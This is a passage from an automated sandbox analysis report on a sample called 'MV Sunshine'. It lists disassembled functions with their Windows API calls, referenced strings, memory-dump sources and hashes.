Part of subcall function 00627D2C: _memmove.LIBCMT ref: 00627D66

Strings

ListBox, xrefs: 006793B5
ComboBox, xrefs: 00679380

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: MessageSend$_memmove$ClassName
String ID: ComboBox$ListBox
API String ID: 365058703-1403004172
Opcode ID: 0165b7eea50980486c82b8f40156b46f2c6faded33a8e2cdc016f948f8e057d7
Instruction ID: fbaa21454e52dc2292e5ac371c1b0f2042d53ccb3b5e097b581cf930571bd008
Opcode Fuzzy Hash: 0165b7eea50980486c82b8f40156b46f2c6faded33a8e2cdc016f948f8e057d7
Instruction Fuzzy Hash: A9210471900104BADB14ABB4DC86CFFB7BBDF06320B14812DF929972E1DB340D4ADA20

Function 0062410D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0065D5EC

Part of subcall function 00627D2C: _memmove.LIBCMT ref: 00627D66

_memset.LIBCMT ref: 0062418D
_wcscpy.LIBCMT ref: 006241E1
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 006241F1

Strings

Line: , xrefs: 0065D615

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
String ID: Line:
API String ID: 3942752672-1585850449
Opcode ID: f7333f9e64fc6c41b0096b638a2007321aa3f7eabe46fe6f9cde9629d1ad3ae1
Instruction ID: 216e956f36c2b920803b28c7bbff503ca761f44f30d891de5e6ba3ce7a271447
Opcode Fuzzy Hash: f7333f9e64fc6c41b0096b638a2007321aa3f7eabe46fe6f9cde9629d1ad3ae1
Instruction Fuzzy Hash: 8731C1710087649ED761EB60EC86FDB77EAAF54300F10491EB185961A1EF70A748CF97

Function 006A6656 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00621D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00621D73
Part of subcall function 00621D35: GetStockObject.GDI32(00000011), ref: 00621D87
Part of subcall function 00621D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00621D91

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 006A66D0
LoadLibraryW.KERNEL32(?), ref: 006A66D7
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 006A66EC
DestroyWindow.USER32(?), ref: 006A66F4

Strings

SysAnimate32, xrefs: 006A66AB

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: 4b6dda74b612bf2fff4f9e7c6e7b58cd25226d3997f3b4a74a3182ba35ea6022
Instruction ID: 5464bc62420d5c10ea08b73615e9c79bc2430ed5e04db141823dde7a557a54dc
Opcode Fuzzy Hash: 4b6dda74b612bf2fff4f9e7c6e7b58cd25226d3997f3b4a74a3182ba35ea6022
Instruction Fuzzy Hash: 5621C271100205ABEF106F64DC80EFB77AFEF1A368F182629F91092290D771DC419F61

Function 0068703E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 0068705E
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00687091
GetStdHandle.KERNEL32(0000000C), ref: 006870A3
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 006870DD

Strings

nul, xrefs: 006870D8

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 5ea3471754d2c3f13ea9fc24173e20b2cb51ad9ae8de254b161b7d4655a1174b
Instruction ID: a9960267f215ef975d221352b6082c5a055abe3d5693e783f3489ed087a1d7a4
Opcode Fuzzy Hash: 5ea3471754d2c3f13ea9fc24173e20b2cb51ad9ae8de254b161b7d4655a1174b
Instruction Fuzzy Hash: 2B217FB4504209ABDB20AF68D805A9A77FAAF95720F304719F9A0D72D0D771E940CB61

Function 0068710C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 0068712B
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0068715D
GetStdHandle.KERNEL32(000000F6), ref: 0068716E
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 006871A8

Strings

nul, xrefs: 006871A3

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 441a145b94c93b3457ad1b4aaae9d8ba7099299a5135af87eb8ff1ceb88fc552
Instruction ID: cdc5e49e2fd8e65a27f0c38612cc51eda70f81f3213fcb0d75dd6467cedb05ae
Opcode Fuzzy Hash: 441a145b94c93b3457ad1b4aaae9d8ba7099299a5135af87eb8ff1ceb88fc552
Instruction Fuzzy Hash: 8B2190756082059BDB20AF689C08A9AB7EAAF55724F340719F9E0D73D0D770E941CB51

Function 0068AEAB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0068AEBF
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0068AF13
__swprintf.LIBCMT ref: 0068AF2C
SetErrorMode.KERNEL32(00000000,00000001,00000000,006AF910), ref: 0068AF6A

Strings

%lu, xrefs: 0068AF26

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: 7a0a3d29e8a652a2399a8cdf49a7f4600c690a1248e5ad137dc565eeed20027b
Instruction ID: 3aaed30ec3a0c252880393a0b56ab33d6999a4b0fa712bff5db96a741c2f0e08
Opcode Fuzzy Hash: 7a0a3d29e8a652a2399a8cdf49a7f4600c690a1248e5ad137dc565eeed20027b
Instruction Fuzzy Hash: AC217434A00109AFDB50EF94D985DAE77B9EF89704B104069F909DB351DB31EE45CF25

Function 0067A52F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00627D2C: _memmove.LIBCMT ref: 00627D66

Part of subcall function 0067A37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0067A399
Part of subcall function 0067A37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0067A3AC
Part of subcall function 0067A37C: GetCurrentThreadId.KERNEL32 ref: 0067A3B3
Part of subcall function 0067A37C: AttachThreadInput.USER32(00000000), ref: 0067A3BA

GetFocus.USER32 ref: 0067A554

Part of subcall function 0067A3C5: GetParent.USER32(?), ref: 0067A3D3

GetClassNameW.USER32(?,?,00000100), ref: 0067A59D
EnumChildWindows.USER32(?,0067A615), ref: 0067A5C5
__swprintf.LIBCMT ref: 0067A5DF

Strings

%s%d, xrefs: 0067A5D9

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
String ID: %s%d
API String ID: 1941087503-1110647743
Opcode ID: e8e69906e939dea8319d1fa561912997d15318bf14892a8ecf983988c10e0706
Instruction ID: e2f3c72db81a4328d7ac43d6946adb5e931db5631a24029049573e0c5e645139
Opcode Fuzzy Hash: e8e69906e939dea8319d1fa561912997d15318bf14892a8ecf983988c10e0706
Instruction Fuzzy Hash: AE11B471600208BBDF507FA4EC85FEE777E9F89710F048079B90CAA192CA7059458B7A

Function 00682017 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00682048

Strings

EXISTS, xrefs: 00682070
REMOVE, xrefs: 0068204E
APPEND, xrefs: 00682081
KEYS, xrefs: 0068205F

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 3964851224-769500911
Opcode ID: 2d4cffe051fafae30cc830d667bd381ea2f9aa453c148aeecf8ac949ad707c88
Instruction ID: dca717edb713ab4506fe47ac858a8e518c8e7da4cf423d4ccda3efa32f1a836f
Opcode Fuzzy Hash: 2d4cffe051fafae30cc830d667bd381ea2f9aa453c148aeecf8ac949ad707c88
Instruction Fuzzy Hash: 6A115B30D0411A8FCF40EFA4D9518EEB7B6FF16304F10856DD855A7352EB32691ACB51

Function 0069EE69 Relevance: 7.7, APIs: 5, Instructions: 247COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0069EF1B
GetProcessIoCounters.KERNEL32(00000000,?), ref: 0069EF4B
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0069F07E
CloseHandle.KERNEL32(?), ref: 0069F0FF

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: 3f17af1d768a1972aeba47c2bf3e55a6cafb86ff041d424ccb4c2bd234abe71d
Instruction ID: 4a4a8c3ba2244899357247eec115bb76601ea9cacf152779f7b5ecf66855a75f
Opcode Fuzzy Hash: 3f17af1d768a1972aeba47c2bf3e55a6cafb86ff041d424ccb4c2bd234abe71d
Instruction Fuzzy Hash: 528182716007109FDB60EF24DC46B6AB7EAAF88720F04881DF595DB792DB71AC408F96

Function 006A02C2 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00627F41: _memmove.LIBCMT ref: 00627F82

Part of subcall function 006A10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,006A0038,?,?), ref: 006A10BC

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 006A0388
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 006A03C7
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 006A040E
RegCloseKey.ADVAPI32(?,?), ref: 006A043A
RegCloseKey.ADVAPI32(00000000), ref: 006A0447

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
String ID:
API String ID: 3440857362-0
Opcode ID: f4e8aa970ec4a3d25d967b34da4b9a56ad83506aa6390c097a06f5b79847894f
Instruction ID: a872cf3b05d6b7f8343387ee97df18f22361ac392e296c22721ba8ef54419bb3
Opcode Fuzzy Hash: f4e8aa970ec4a3d25d967b34da4b9a56ad83506aa6390c097a06f5b79847894f
Instruction Fuzzy Hash: A0515A31208205AFDB44EF64D891E6EB7EAFF89304F04892DB596872A1DB31ED05CF56

Function 0068E7DC Relevance: 7.6, APIs: 5, Instructions: 135COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0068E88A
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0068E8B3
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0068E8F2

Part of subcall function 00629997: __itow.LIBCMT ref: 006299C2
Part of subcall function 00629997: __swprintf.LIBCMT ref: 00629A0C

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0068E917
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0068E91F

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: aacccdca542e8d1129268515cde6cc24e61c90932e1cb2e915380c0fa9de71c4
Instruction ID: 25bac0eaf7ec536341f1ed57462a97c592b1890d4204025aadaed9058e72c98b
Opcode Fuzzy Hash: aacccdca542e8d1129268515cde6cc24e61c90932e1cb2e915380c0fa9de71c4
Instruction Fuzzy Hash: A4513B35A00615DFDF40EFA4C981AADBBF6EF49310B148099E849AB361CB32ED41CF65

Function 006AA2C5 Relevance: 7.6, APIs: 5, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e68bc1ea14f6828fc7a0f447c47e8f3d66a1783155e707fdb0f8035e97df55fc
Instruction ID: c8afc316ec46127bd50aa5e024e850bd0022fdeed9a0282346ccc7acd6fc7b19
Opcode Fuzzy Hash: e68bc1ea14f6828fc7a0f447c47e8f3d66a1783155e707fdb0f8035e97df55fc
Instruction Fuzzy Hash: 25419035900214ABDB20FFA8CC44BE9BBA6EB0B310F144166F955E72A1D770AD41DE62

Function 00622344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00622357
ScreenToClient.USER32(006E67B0,?), ref: 00622374
GetAsyncKeyState.USER32(00000001), ref: 00622399
GetAsyncKeyState.USER32(00000002), ref: 006223A7

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: cd31f26e537a76b26d29caac153ca8ee787263e6785caa9d9e33160172e0eef2
Instruction ID: a05ddd6b653a08bdffcc4e4248d921856556f77863c85b3830cc4849066b6a3c
Opcode Fuzzy Hash: cd31f26e537a76b26d29caac153ca8ee787263e6785caa9d9e33160172e0eef2
Instruction Fuzzy Hash: D2416F31504626FFDF159FA4D844AE9BBB6FB05321F204319F82496290C7746E54DF91

Function 00676920 Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0067695D
TranslateAcceleratorW.USER32(?,?,?), ref: 006769A9
TranslateMessage.USER32(?), ref: 006769D2
DispatchMessageW.USER32(?), ref: 006769DC
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 006769EB

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: Message$PeekTranslate$AcceleratorDispatch
String ID:
API String ID: 2108273632-0
Opcode ID: 8504a22ee739316315f26cc0d3ee219433765f743d294645a792ba4e1c1b8e17
Instruction ID: 7393674eacf7a7e607e99a0d97652d1fe5b9a8f8692e371da10e6be699b1345d
Opcode Fuzzy Hash: 8504a22ee739316315f26cc0d3ee219433765f743d294645a792ba4e1c1b8e17
Instruction Fuzzy Hash: 7831F831900B47AEDB20CF74CC84FF67BAFAB12340F109169F529C62A1E7749885DB90

Function 00678F01 Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00678F12
PostMessageW.USER32(?,00000201,00000001), ref: 00678FBC
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00678FC4
PostMessageW.USER32(?,00000202,00000000), ref: 00678FD2
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00678FDA

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 17a293e38fd30ac223c6a6362da36a2aa3a8e96900f1689e4a1fdd364143848a
Instruction ID: 53e12700a4ac5298fc03abd0981ca69d44a289dfc1246e4859ba8e4f0b4ab220
Opcode Fuzzy Hash: 17a293e38fd30ac223c6a6362da36a2aa3a8e96900f1689e4a1fdd364143848a
Instruction Fuzzy Hash: 0A31CD71500219EFDB10CFA8D94CADE7BB6EB05315F108229F928E72D0CBB49D10CB91

Function 0067B6AF Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0067B6C7
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0067B6E4
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0067B71C
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0067B742
_wcsstr.LIBCMT ref: 0067B74C

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: 284e73ef475001d9d105f56addb2c1bb926ceb29e8a90d33712a3143af9b8588
Instruction ID: aa1d5f57fd5ad26174877ef3452cd7700b49ef20929b68bb0dd5986c4131e0a8
Opcode Fuzzy Hash: 284e73ef475001d9d105f56addb2c1bb926ceb29e8a90d33712a3143af9b8588
Instruction Fuzzy Hash: CB21D731204244BAEB295B799C49F7B7B9ADF4A720F10903DFD09CA2A1EF61DC4197A1

Function 006AB405 Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 00622612: GetWindowLongW.USER32(?,000000EB), ref: 00622623

GetWindowLongW.USER32(?,000000F0), ref: 006AB44C
SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 006AB471
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 006AB489
GetSystemMetrics.USER32(00000004), ref: 006AB4B2
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00691184,00000000), ref: 006AB4D0

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: c4e110bd0230e06be9b42587b44f5847c15eb29c0459a0a497cf26ae5a88f01d
Instruction ID: 839b4904dffebc5f5da06424363184f51719e4f2926487b7a648526592ddd349
Opcode Fuzzy Hash: c4e110bd0230e06be9b42587b44f5847c15eb29c0459a0a497cf26ae5a88f01d
Instruction Fuzzy Hash: 80218231910265AFCB10AF78DC44AA63BE6EB1A720F105728F925C62E7E7309C11DF50

Function 006797E9 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON

Download Yara Rule

APIs

